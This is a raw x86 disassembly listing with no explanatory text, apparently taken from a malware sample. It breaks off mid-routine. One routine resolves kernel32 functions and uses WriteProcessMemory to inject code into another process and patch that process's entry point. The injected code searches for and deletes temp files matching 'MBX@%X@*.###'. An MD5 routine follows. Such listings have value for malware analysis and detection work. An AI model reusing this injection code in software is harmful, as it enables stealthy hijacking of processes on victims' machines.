stosw
stosb
lea eax, [ebp+var_104]
push eax
push 104h
call ds:dword_511970
lea eax, [ebp+var_104]
push eax
call ds:dword_511974
lea eax, [ebp+var_104]
push eax
push 104h
call ds:dword_511978
push 64h
call ds:dword_511998
loc_5073FB: ; CODE XREF: sub_507333+124�j
lea eax, [ebp+var_24C]
push eax
push offset dword_5119A0
call ds:dword_51197C
mov [ebp+var_10C], eax
cmp [ebp+var_10C], 0FFFFFFFFh
jz short loc_507459
lea eax, [ebp+var_220]
push eax
call ds:dword_511980
test eax, eax
jnz short loc_50744B
push 1F4h
call ds:dword_511998
lea eax, [ebp+var_220]
push eax
call ds:dword_511980
test eax, eax
jnz short loc_50744B
jmp short loc_507478
; ---------------------------------------------------------------------------
loc_50744B: ; CODE XREF: sub_507333+F8�j
; sub_507333+114�j
push [ebp+var_10C]
call ds:dword_511984
jmp short loc_5073FB
; ---------------------------------------------------------------------------
loc_507459: ; CODE XREF: sub_507333+E7�j
; sub_507333:loc_507478�j
cmp [ebp+var_10C], 0FFFFFFFFh
jz short loc_50746E
push [ebp+var_10C]
call ds:dword_511984
loc_50746E: ; CODE XREF: sub_507333+12D�j
push 0
call ds:dword_511990
jmp short loc_50747A
; ---------------------------------------------------------------------------
loc_507478: ; CODE XREF: sub_507333+116�j
jmp short loc_507459
; ---------------------------------------------------------------------------
loc_50747A: ; CODE XREF: sub_507333+143�j
pop edi
leave
retn
sub_507333 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50747D proc near ; DATA XREF: sub_507494+2B6�o
push ebp
mov ebp, esp
pop ebp
retn
sub_50747D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_507482 proc near ; DATA XREF: sub_507494+2EF�o
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov eax, offset sub_507333
call eax ; sub_507333
pop edi
pop esi
pop ebx
pop ebp
retn
sub_507482 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_507494 proc near ; CODE XREF: sub_5071C3+107�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = byte ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 24h
push esi
push edi
push 0
call ds:dword_511718 ; GetModuleHandleA
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
mov ecx, [ebp+var_24]
add ecx, [eax+3Ch]
mov [ebp+var_20], ecx
mov eax, [ebp+arg_4]
mov ds:dword_511920, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_511920
push offset dword_511920
push [ebp+arg_0]
call ds:dword_50E028 ; WriteProcessMemory
push 20h
pop ecx
xor eax, eax
mov edi, offset dword_5119A0
rep stosd
call ds:dword_5116E8 ; GetCurrentProcessId
push eax
push offset aMbx@X@_ ; "MBX@%X@*.###"
push offset dword_5119A0
call ds:dword_5117D4 ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_14]
push eax
push 80h
push offset dword_5119A0
push offset dword_5119A0
push [ebp+arg_0]
call ds:dword_50E028 ; WriteProcessMemory
mov esi, offset aKernel32_dll_0 ; "kernel32.dll"
lea edi, [ebp+var_10]
movsd
movsd
movsd
movsb
lea eax, [ebp+var_10]
push eax
push offset aGettemppatha ; "GetTempPathA"
call sub_509D79
pop ecx
pop ecx
mov ds:dword_511970, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_511970
push offset dword_511970
push [ebp+arg_0]
call ds:dword_50E028 ; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aSetcurrentdire ; "SetCurrentDirectoryA"
call sub_509D79
pop ecx
pop ecx
mov ds:dword_511974, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_511974
push offset dword_511974
push [ebp+arg_0]
call ds:dword_50E028 ; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aGetcurrentdire ; "GetCurrentDirectoryA"
call sub_509D79
pop ecx
pop ecx
mov ds:dword_511978, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_511978
push offset dword_511978
push [ebp+arg_0]
call ds:dword_50E028 ; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aFindfirstfilea ; "FindFirstFileA"
call sub_509D79
pop ecx
pop ecx
mov ds:dword_51197C, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_51197C
push offset dword_51197C
push [ebp+arg_0]
call ds:dword_50E028 ; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aDeletefilea ; "DeleteFileA"
call sub_509D79
pop ecx
pop ecx
mov ds:dword_511980, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_511980
push offset dword_511980
push [ebp+arg_0]
call ds:dword_50E028 ; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aFindclose ; "FindClose"
call sub_509D79
pop ecx
pop ecx
mov ds:dword_511984, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_511984
push offset dword_511984
push [ebp+arg_0]
call ds:dword_50E028 ; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aGetexitcodepro ; "GetExitCodeProcess"
call sub_509D79
pop ecx
pop ecx
mov ds:dword_511988, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_511988
push offset dword_511988
push [ebp+arg_0]
call ds:dword_50E028 ; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aWaitforsingleo ; "WaitForSingleObject"
call sub_509D79
pop ecx
pop ecx
mov ds:dword_51198C, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_51198C
push offset dword_51198C
push [ebp+arg_0]
call ds:dword_50E028 ; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aExitprocess ; "ExitProcess"
call sub_509D79
pop ecx
pop ecx
mov ds:dword_511990, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_511990
push offset dword_511990
push [ebp+arg_0]
call ds:dword_50E028 ; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aOpenprocess ; "OpenProcess"
call sub_509D79
pop ecx
pop ecx
mov ds:dword_511994, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_511994
push offset dword_511994
push [ebp+arg_0]
call ds:dword_50E028 ; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aSleep ; "Sleep"
call sub_509D79
pop ecx
pop ecx
mov ds:dword_511998, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_511998
push offset dword_511998
push [ebp+arg_0]
call ds:dword_50E028 ; WriteProcessMemory
lea eax, [ebp+var_10]
push eax
push offset aClosehandle ; "CloseHandle"
call sub_509D79
pop ecx
pop ecx
mov ds:dword_51199C, eax
lea eax, [ebp+var_14]
push eax
push 4
push offset dword_51199C
push offset dword_51199C
push [ebp+arg_0]
call ds:dword_50E028 ; WriteProcessMemory
mov eax, offset sub_50747D
sub eax, offset sub_507333
mov [ebp+var_1C], eax
lea eax, [ebp+var_14]
push eax
push [ebp+var_1C]
push offset sub_507333
push offset sub_507333
push [ebp+arg_0]
call ds:dword_50E028 ; WriteProcessMemory
mov eax, [ebp+var_20]
mov ecx, [ebp+var_24]
add ecx, [eax+28h]
mov [ebp+var_18], ecx
lea eax, [ebp+var_14]
push eax
push 20h
push offset sub_507482
push [ebp+var_18]
push [ebp+arg_0]
call ds:dword_50E028 ; WriteProcessMemory
pop edi
pop esi
leave
retn
sub_507494 endp
; =============== S U B R O U T I N E =======================================
sub_507798 proc near ; CODE XREF: _5:004FEECC�p
; sub_503610+209�p
push esi
mov esi, ecx
call sub_5079B1
mov eax, esi
pop esi
retn
sub_507798 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_5077A4 proc near ; CODE XREF: sub_503610+21D�p
; sub_50785D+112�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
mov ebx, ecx
cmp byte ptr [ebx+68h], 0
jnz loc_507858
mov edx, [ebx+10h]
mov ecx, [ebp+arg_4]
push esi
mov eax, edx
mov esi, ecx
lea edx, [edx+ecx*8]
shr eax, 3
shl esi, 3
and eax, 3Fh
cmp edx, esi
push edi
mov [ebx+10h], edx
jnb short loc_5077D7
inc dword ptr [ebx+14h]
loc_5077D7: ; CODE XREF: sub_5077A4+2E�j
mov edx, ecx
push 40h
shr edx, 1Dh
add [ebx+14h], edx
pop edx
sub edx, eax
cmp ecx, edx
mov [ebp+var_4], edx
jb short loc_50783B
mov esi, [ebp+arg_0]
mov ecx, edx
lea edi, [eax+ebx+18h]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
lea eax, [ebx+18h]
and ecx, 3
push eax
rep movsb
mov ecx, ebx
call sub_5079D8
mov esi, [ebp+var_4]
lea eax, [esi+3Fh]
cmp eax, [ebp+arg_4]
jnb short loc_507834
mov edi, eax
loc_50781A: ; CODE XREF: sub_5077A4+8E�j
mov eax, [ebp+arg_0]
mov ecx, ebx
lea eax, [eax+edi-3Fh]
push eax
call sub_5079D8
add edi, 40h
add esi, 40h
cmp edi, [ebp+arg_4]
jb short loc_50781A
loc_507834: ; CODE XREF: sub_5077A4+72�j
mov ecx, [ebp+arg_4]
xor eax, eax
jmp short loc_50783D
; ---------------------------------------------------------------------------
loc_50783B: ; CODE XREF: sub_5077A4+45�j
xor esi, esi
loc_50783D: ; CODE XREF: sub_5077A4+95�j
mov edx, [ebp+arg_0]
sub ecx, esi
lea edi, [eax+ebx+18h]
mov eax, ecx
add esi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
pop edi
pop esi
loc_507858: ; CODE XREF: sub_5077A4+B�j
pop ebx
leave
retn 8
sub_5077A4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50785D proc near ; CODE XREF: sub_503610+22F�p
var_4C = byte ptr -4Ch
var_4B = byte ptr -4Bh
var_4A = byte ptr -4Ah
var_49 = byte ptr -49h
var_48 = byte ptr -48h
var_47 = byte ptr -47h
var_46 = byte ptr -46h
var_45 = byte ptr -45h
var_44 = byte ptr -44h
var_43 = byte ptr -43h
var_42 = byte ptr -42h
var_41 = byte ptr -41h
var_40 = byte ptr -40h
var_3F = byte ptr -3Fh
var_3E = byte ptr -3Eh
var_3D = byte ptr -3Dh
var_3C = byte ptr -3Ch
var_3B = byte ptr -3Bh
var_3A = byte ptr -3Ah
var_39 = byte ptr -39h
var_38 = byte ptr -38h
var_37 = byte ptr -37h
var_36 = byte ptr -36h
var_35 = byte ptr -35h
var_34 = byte ptr -34h
var_33 = byte ptr -33h
var_32 = byte ptr -32h
var_31 = byte ptr -31h
var_30 = byte ptr -30h
var_2F = byte ptr -2Fh
var_2E = byte ptr -2Eh
var_2D = byte ptr -2Dh
var_2C = byte ptr -2Ch
var_2B = byte ptr -2Bh
var_2A = byte ptr -2Ah
var_29 = byte ptr -29h
var_28 = byte ptr -28h
var_27 = byte ptr -27h
var_26 = byte ptr -26h
var_25 = byte ptr -25h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = byte ptr -22h
var_21 = byte ptr -21h
var_20 = byte ptr -20h
var_1F = byte ptr -1Fh
var_1E = byte ptr -1Eh
var_1D = byte ptr -1Dh
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_1A = byte ptr -1Ah
var_19 = byte ptr -19h
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_10 = byte ptr -10h
var_F = byte ptr -0Fh
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
var_C = byte ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 4Ch
push ebx
push esi
mov esi, ecx
xor ebx, ebx
push edi
mov [ebp+var_4], esi
cmp [esi+68h], bl
mov [ebp+var_4C], 80h
mov [ebp+var_4B], bl
mov [ebp+var_4A], bl
mov [ebp+var_49], bl
mov [ebp+var_48], bl
mov [ebp+var_47], bl
mov [ebp+var_46], bl
mov [ebp+var_45], bl
mov [ebp+var_44], bl
mov [ebp+var_43], bl
mov [ebp+var_42], bl
mov [ebp+var_41], bl
mov [ebp+var_40], bl
mov [ebp+var_3F], bl
mov [ebp+var_3E], bl
mov [ebp+var_3D], bl
mov [ebp+var_3C], bl
mov [ebp+var_3B], bl
mov [ebp+var_3A], bl
mov [ebp+var_39], bl
mov [ebp+var_38], bl
mov [ebp+var_37], bl
mov [ebp+var_36], bl
mov [ebp+var_35], bl
mov [ebp+var_34], bl
mov [ebp+var_33], bl
mov [ebp+var_32], bl
mov [ebp+var_31], bl
mov [ebp+var_30], bl
mov [ebp+var_2F], bl
mov [ebp+var_2E], bl
mov [ebp+var_2D], bl
mov [ebp+var_2C], bl
mov [ebp+var_2B], bl
mov [ebp+var_2A], bl
mov [ebp+var_29], bl
mov [ebp+var_28], bl
mov [ebp+var_27], bl
mov [ebp+var_26], bl
mov [ebp+var_25], bl
mov [ebp+var_24], bl
mov [ebp+var_23], bl
mov [ebp+var_22], bl
mov [ebp+var_21], bl
mov [ebp+var_20], bl
mov [ebp+var_1F], bl
mov [ebp+var_1E], bl
mov [ebp+var_1D], bl
mov [ebp+var_1C], bl
mov [ebp+var_1B], bl
mov [ebp+var_1A], bl
mov [ebp+var_19], bl
mov [ebp+var_18], bl
mov [ebp+var_17], bl
mov [ebp+var_16], bl
mov [ebp+var_15], bl
mov [ebp+var_14], bl
mov [ebp+var_13], bl
mov [ebp+var_12], bl
mov [ebp+var_11], bl
mov [ebp+var_10], bl
mov [ebp+var_F], bl
mov [ebp+var_E], bl
mov [ebp+var_D], bl
jz short loc_507943
mov edi, [ebp+arg_0]
cmp edi, ebx
jz short loc_5079AA
add esi, 58h
movsd
movsd
movsd
movsd
jmp short loc_5079AA
; ---------------------------------------------------------------------------
loc_507943: ; CODE XREF: sub_50785D+D4�j
lea edi, [esi+10h]
push 8
lea eax, [ebp+var_C]
push edi
push eax
mov ecx, esi
call sub_5082B3
mov eax, [edi]
push 38h
shr eax, 3
and eax, 3Fh
pop ecx
cmp eax, ecx
jb short loc_507966
push 78h
pop ecx
loc_507966: ; CODE XREF: sub_50785D+104�j
sub ecx, eax
lea eax, [ebp+var_4C]
push ecx
push eax
mov ecx, esi
call sub_5077A4
lea eax, [ebp+var_C]
push 8
push eax
mov ecx, esi
call sub_5077A4
lea edi, [esi+58h]
push 10h
push esi
push edi
mov ecx, esi
call sub_5082B3
cmp [ebp+arg_0], ebx
jz short loc_5079A0
mov esi, edi
mov edi, [ebp+arg_0]
movsd
movsd
movsd
movsd
mov esi, [ebp+var_4]
loc_5079A0: ; CODE XREF: sub_50785D+135�j
xor eax, eax
lea edi, [esi+18h]
stosb
mov byte ptr [esi+68h], 1
loc_5079AA: ; CODE XREF: sub_50785D+DB�j
; sub_50785D+E4�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_50785D endp
; =============== S U B R O U T I N E =======================================
sub_5079B1 proc near ; CODE XREF: sub_507798+3�p
xor eax, eax
mov dword ptr [ecx], 67452301h
mov [ecx+68h], al
mov [ecx+10h], eax
mov [ecx+14h], eax
mov dword ptr [ecx+4], 0EFCDAB89h
mov dword ptr [ecx+8], 98BADCFEh
mov dword ptr [ecx+0Ch], 10325476h
retn
sub_5079B1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_5079D8 proc near ; CODE XREF: sub_5077A4+64�p
; sub_5077A4+80�p
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 50h
push ebx
push esi
mov esi, ecx
push edi
push 40h
mov eax, [esi]
push [ebp+arg_0]
mov [ebp+var_4], eax
mov eax, [esi+4]
mov [ebp+var_8], eax
mov eax, [esi+8]
mov [ebp+var_C], eax
mov eax, [esi+0Ch]
mov [ebp+var_10], eax
lea eax, [ebp+var_50]
push eax
call sub_5082FA
mov edi, [ebp+var_8]
mov ebx, [ebp+var_C]
mov eax, edi
mov ecx, ebx
not eax
and eax, [ebp+var_10]
and ecx, edi
mov edx, edi
or eax, ecx
mov ecx, [ebp+var_4]
add eax, [ebp+var_50]
lea ecx, [ecx+eax-28955B88h]
mov eax, ecx
shr eax, 19h
shl ecx, 7
or eax, ecx
add eax, edi
mov ecx, eax
and edx, eax
not ecx
and ecx, ebx
or ecx, edx
mov edx, [ebp+var_10]
add ecx, [ebp+var_4C]
lea edx, [edx+ecx-173848AAh]
mov ecx, edx
shr ecx, 14h
shl edx, 0Ch
or ecx, edx
add ecx, eax
mov edx, ecx
not edx
and edx, edi
mov edi, ecx
and edi, eax
or edx, edi
add edx, [ebp+var_48]
lea edx, [ebx+edx+242070DBh]
mov ebx, ecx
mov edi, edx
shr edi, 0Fh
shl edx, 11h
or edi, edx
add edi, ecx
mov edx, edi
and ebx, edi
not edx
and edx, eax
mov [ebp+var_C], edi
or edx, ebx
mov ebx, [ebp+var_8]
add edx, [ebp+var_44]
lea ebx, [ebx+edx-3E423112h]
mov edx, ebx
shl edx, 16h
shr ebx, 0Ah
or edx, ebx
add edx, edi
mov ebx, edx
and edi, edx
not ebx
and ebx, ecx
or ebx, edi
add ebx, [ebp+var_40]
lea eax, [eax+ebx-0A83F051h]
mov edi, eax
shr edi, 19h
shl eax, 7
or edi, eax
mov eax, edx
add edi, edx
mov [ebp+var_4], edi
and eax, [ebp+var_4]
not edi
and edi, [ebp+var_C]
or edi, eax
add edi, [ebp+var_3C]
lea ecx, [ecx+edi+4787C62Ah]
mov eax, ecx
shr eax, 14h
shl ecx, 0Ch
or eax, ecx
add eax, [ebp+var_4]
mov ecx, eax
mov edi, eax
and edi, [ebp+var_4]
mov ebx, eax
not ecx
and ecx, edx
or ecx, edi
mov edi, [ebp+var_C]
add ecx, [ebp+var_38]
lea edi, [edi+ecx-57CFB9EDh]
mov ecx, edi
shr ecx, 0Fh
shl edi, 11h
or ecx, edi
add ecx, eax
mov edi, ecx
and ebx, ecx
not edi
and edi, [ebp+var_4]
or edi, ebx
mov ebx, ecx
add edi, [ebp+var_34]
lea edx, [edx+edi-2B96AFFh]
mov edi, edx
shl edi, 16h
shr edx, 0Ah
or edi, edx
add edi, ecx
mov edx, edi
and ebx, edi
not edx
and edx, eax
mov [ebp+var_8], edi
or edx, ebx
mov ebx, [ebp+var_4]
add edx, [ebp+var_30]
lea ebx, [ebx+edx+698098D8h]
mov edx, ebx
shr edx, 19h
shl ebx, 7
or edx, ebx
add edx, edi
mov ebx, edx
and edi, edx
not ebx
and ebx, ecx
or ebx, edi
add ebx, [ebp+var_2C]
lea eax, [eax+ebx-74BB0851h]
mov edi, eax
shr edi, 14h
shl eax, 0Ch
or edi, eax
add edi, edx
mov eax, edi
mov ebx, edi
not eax
and eax, [ebp+var_8]
and ebx, edx
or eax, ebx
add eax, [ebp+var_28]
lea ecx, [ecx+eax-0A44Fh]
mov ebx, ecx
shr ebx, 0Fh
shl ecx, 11h
or ebx, ecx
mov ecx, edi
add ebx, edi
mov eax, ebx
and ecx, ebx
not eax
and eax, edx
mov [ebp+var_C], ebx
or eax, ecx
mov ecx, [ebp+var_8]
add eax, [ebp+var_24]
lea ecx, [ecx+eax-76A32842h]
mov eax, ecx
shl eax, 16h
shr ecx, 0Ah
or eax, ecx
add eax, ebx
mov ecx, eax
and ebx, eax
not ecx
and ecx, edi
or ecx, ebx
add ecx, [ebp+var_20]
lea edx, [edx+ecx+6B901122h]
mov ecx, edx
shr ecx, 19h
shl edx, 7
or ecx, edx
mov edx, eax
add ecx, eax
mov [ebp+var_4], ecx
and edx, [ebp+var_4]
not ecx
and ecx, [ebp+var_C]
or ecx, edx
add ecx, [ebp+var_1C]
lea edi, [edi+ecx-2678E6Dh]
mov ecx, edi
shr ecx, 14h
shl edi, 0Ch
or ecx, edi
add ecx, [ebp+var_4]
mov [ebp+arg_0], ecx
mov edi, ecx
not [ebp+arg_0]
mov edx, [ebp+arg_0]
and edi, [ebp+var_4]
and edx, eax
mov ebx, ecx
or edx, edi
mov edi, [ebp+var_C]
add edx, [ebp+var_18]
lea edi, [edi+edx-5986BC72h]
mov edx, edi
shr edx, 0Fh
shl edi, 11h
or edx, edi
add edx, ecx
mov [ebp+var_10], edx
and ebx, edx
not [ebp+var_10]
mov edi, [ebp+var_10]
and edi, [ebp+var_4]
or edi, ebx
mov ebx, ecx
add edi, [ebp+var_14]
lea eax, [eax+edi+49B40821h]
mov edi, eax
shl edi, 16h
shr eax, 0Ah
or edi, eax
mov eax, [ebp+arg_0]
add edi, edx
and eax, edx
and ebx, edi
or eax, ebx
mov ebx, [ebp+var_4]
add eax, [ebp+var_4C]
lea eax, [ebx+eax-9E1DA9Eh]
mov ebx, eax
shr ebx, 1Bh
shl eax, 5
or ebx, eax
mov eax, [ebp+var_10]
and eax, edi
add ebx, edi
mov [ebp+arg_0], eax
mov eax, edx
and eax, ebx
mov [ebp+var_4], ebx
mov ebx, eax
mov eax, [ebp+arg_0]
or eax, ebx
add eax, [ebp+var_38]
lea ecx, [ecx+eax-3FBF4CC0h]
mov eax, ecx
shr eax, 17h
shl ecx, 9
or eax, ecx
mov ecx, edi
add eax, [ebp+var_4]
not ecx
and ecx, [ebp+var_4]
mov ebx, eax
and ebx, edi
or ecx, ebx
add ecx, [ebp+var_24]
lea edx, [edx+ecx+265E5A51h]
mov ecx, edx
shr ecx, 12h
shl edx, 0Eh
or ecx, edx
mov edx, [ebp+var_4]
add ecx, eax
mov [ebp+var_C], ecx
and ecx, [ebp+var_4]
not edx
and edx, eax
mov ebx, [ebp+var_C]
or edx, ecx
add edx, [ebp+var_50]
lea edi, [edi+edx-16493856h]
mov edx, eax
mov ecx, edi
shl ecx, 14h
shr edi, 0Ch
or ecx, edi
mov edi, eax
add ecx, ebx
not edx
and edx, ebx
and edi, ecx
or edx, edi
mov edi, [ebp+var_4]
add edx, [ebp+var_3C]
lea edx, [edi+edx-29D0EFA3h]
mov edi, edx
shr edi, 1Bh
shl edx, 5
or edi, edx
mov edx, ebx
add edi, ecx
mov [ebp+var_4], edi
mov edi, ebx
and edi, [ebp+var_4]
not edx
and edx, ecx
or edx, edi
add edx, [ebp+var_28]
lea eax, [eax+edx+2441453h]
mov edx, eax
shr edx, 17h
shl eax, 9
or edx, eax
mov eax, ecx
add edx, [ebp+var_4]
not eax
and eax, [ebp+var_4]
mov edi, edx
and edi, ecx
or eax, edi
add eax, [ebp+var_14]
lea edi, [ebx+eax-275E197Fh]
mov eax, edi
shr eax, 12h
shl edi, 0Eh
or eax, edi
mov edi, [ebp+var_4]
add eax, edx
mov ebx, eax
and ebx, [ebp+var_4]
not edi
and edi, edx
or edi, ebx
mov ebx, edx
add edi, [ebp+var_40]
lea ecx, [ecx+edi-182C0438h]
mov edi, ecx
shl edi, 14h
shr ecx, 0Ch
or edi, ecx
mov ecx, edx
add edi, eax
not ecx
and ecx, eax
and ebx, edi
or ecx, ebx
mov ebx, [ebp+var_4]
add ecx, [ebp+var_2C]
mov [ebp+var_8], edi
lea ebx, [ebx+ecx+21E1CDE6h]
mov ecx, ebx
shr ecx, 1Bh
shl ebx, 5
or ecx, ebx
mov ebx, eax
not ebx
add ecx, edi
and ebx, edi
mov edi, eax
and edi, ecx
or ebx, edi
add ebx, [ebp+var_18]
lea edx, [edx+ebx-3CC8F82Ah]
mov edi, edx
shr edi, 17h
shl edx, 9
or edi, edx
mov edx, [ebp+var_8]
add edi, ecx
mov ebx, edi
and ebx, [ebp+var_8]
not edx
and edx, ecx
or edx, ebx
add edx, [ebp+var_44]
lea eax, [eax+edx-0B2AF279h]
mov edx, eax
shr edx, 12h
shl eax, 0Eh
or edx, eax
mov eax, ecx
add edx, edi
not eax
mov ebx, edx
and eax, edi
and ebx, ecx
or eax, ebx
mov ebx, [ebp+var_8]
add eax, [ebp+var_30]
lea eax, [ebx+eax+455A14EDh]
mov ebx, eax
shl ebx, 14h
shr eax, 0Ch
or ebx, eax
mov eax, edi
add ebx, edx
mov [ebp+var_8], ebx
not eax
mov ebx, edi
and eax, edx
and ebx, [ebp+var_8]
or eax, ebx
add eax, [ebp+var_1C]
lea ecx, [ecx+eax-561C16FBh]
mov eax, ecx
shr eax, 1Bh
shl ecx, 5
or eax, ecx
mov ecx, edx
add eax, [ebp+var_8]
mov [ebp+var_4], eax
and ecx, [ebp+var_4]
mov eax, edx
mov ebx, [ebp+var_4]
not eax
and eax, [ebp+var_8]
or eax, ecx
mov ecx, [ebp+var_8]
add eax, [ebp+var_48]
not ecx
and ecx, ebx
lea edi, [edi+eax-3105C08h]
mov eax, edi
shr eax, 17h
shl edi, 9
or eax, edi
add eax, ebx
mov edi, eax
and edi, [ebp+var_8]
or ecx, edi
add ecx, [ebp+var_34]
lea edx, [edx+ecx+676F02D9h]
mov ecx, edx
shr ecx, 12h
shl edx, 0Eh
or ecx, edx
mov edx, ebx
add ecx, eax
not edx
mov edi, ecx
and edx, eax
and edi, ebx
or edx, edi
mov edi, [ebp+var_8]
add edx, [ebp+var_20]
lea edi, [edi+edx-72D5B376h]
mov edx, edi
shl edx, 14h
shr edi, 0Ch
or edx, edi
mov edi, eax
add edx, ecx
xor edi, ecx
xor edi, edx
add edi, [ebp+var_3C]
lea ebx, [ebx+edi-5C6BEh]
mov edi, ebx
shr edi, 1Ch
shl ebx, 4
or edi, ebx
mov ebx, ecx
add edi, edx
xor ebx, edx
xor ebx, edi
add ebx, [ebp+var_30]
lea eax, [eax+ebx-788E097Fh]
mov ebx, eax
shr ebx, 15h
shl eax, 0Bh
or ebx, eax
add ebx, edi
mov eax, ebx
xor eax, edx
xor eax, edi
add eax, [ebp+var_24]
lea ecx, [ecx+eax+6D9D6122h]
mov eax, ecx
shr eax, 10h
shl ecx, 10h
or eax, ecx
mov ecx, ebx
add eax, ebx
xor ecx, eax
mov [ebp+var_C], eax
mov eax, ecx
xor eax, edi
add eax, [ebp+var_18]
lea edx, [edx+eax-21AC7F4h]
mov eax, edx
shl eax, 17h
shr edx, 9
or eax, edx
add eax, [ebp+var_C]
xor ecx, eax
add ecx, [ebp+var_4C]
lea edi, [edi+ecx-5B4115BCh]
mov ecx, edi
shr ecx, 1Ch
shl edi, 4
or ecx, edi
mov edi, [ebp+var_C]
mov edx, edi
add ecx, eax
xor edx, eax
xor edx, ecx
add edx, [ebp+var_40]
lea ebx, [ebx+edx+4BDECFA9h]
mov edx, ebx
shr edx, 15h
shl ebx, 0Bh
or edx, ebx
add edx, ecx
mov ebx, edx
mov [ebp+arg_0], edx
xor ebx, eax
xor ebx, ecx
add ebx, [ebp+var_34]
lea ebx, [edi+ebx-944B4A0h]
mov edi, ebx
shr edi, 10h
shl ebx, 10h
or edi, ebx
add edi, edx
xor [ebp+arg_0], edi
mov ebx, [ebp+arg_0]
xor ebx, ecx
add ebx, [ebp+var_28]
lea ebx, [eax+ebx-41404390h]
mov eax, ebx
shl eax, 17h
shr ebx, 9
or eax, ebx
mov ebx, [ebp+arg_0]
add eax, edi
xor ebx, eax
add ebx, [ebp+var_1C]
lea ebx, [ecx+ebx+289B7EC6h]
mov ecx, ebx
shr ecx, 1Ch
shl ebx, 4
or ecx, ebx
mov ebx, edi
add ecx, eax
xor ebx, eax
xor ebx, ecx
add ebx, [ebp+var_50]
lea edx, [edx+ebx-155ED806h]
mov ebx, edx
shr ebx, 15h
shl edx, 0Bh
or ebx, edx
add ebx, ecx
mov edx, ebx
xor edx, eax
xor edx, ecx
add edx, [ebp+var_44]
lea edx, [edi+edx-2B10CF7Bh]
mov edi, edx
shr edi, 10h
shl edx, 10h
or edi, edx
mov [ebp+arg_0], ebx
add edi, ebx
xor [ebp+arg_0], edi
mov edx, [ebp+arg_0]
xor edx, ecx
add edx, [ebp+var_38]
lea edx, [eax+edx+4881D05h]
mov eax, edx
shl eax, 17h
shr edx, 9
or eax, edx
mov edx, [ebp+arg_0]
add eax, edi
xor edx, eax
add edx, [ebp+var_2C]
lea edx, [ecx+edx-262B2FC7h]
mov ecx, edx
shr ecx, 1Ch
shl edx, 4
or ecx, edx
mov edx, edi
xor edx, eax
add ecx, eax
xor edx, ecx
add edx, [ebp+var_20]
lea ebx, [ebx+edx-1924661Bh]
mov edx, ebx
shr edx, 15h
shl ebx, 0Bh
or edx, ebx
add edx, ecx
mov ebx, edx
xor ebx, eax
xor ebx, ecx
add ebx, [ebp+var_14]
lea ebx, [edi+ebx+1FA27CF8h]
mov edi, ebx
shr edi, 10h
shl ebx, 10h
or edi, ebx
mov ebx, edx
add edi, edx
xor ebx, edi
xor ebx, ecx
add ebx, [ebp+var_48]
lea eax, [eax+ebx-3B53A99Bh]
mov ebx, eax
shl ebx, 17h
shr eax, 9
or ebx, eax
mov eax, edx
add ebx, edi
not eax
or eax, ebx
xor eax, edi
add eax, [ebp+var_50]
lea eax, [ecx+eax-0BD6DDBCh]
mov ecx, eax
shr ecx, 1Ah
shl eax, 6
or ecx, eax
mov eax, edi
add ecx, ebx
not eax
or eax, ecx
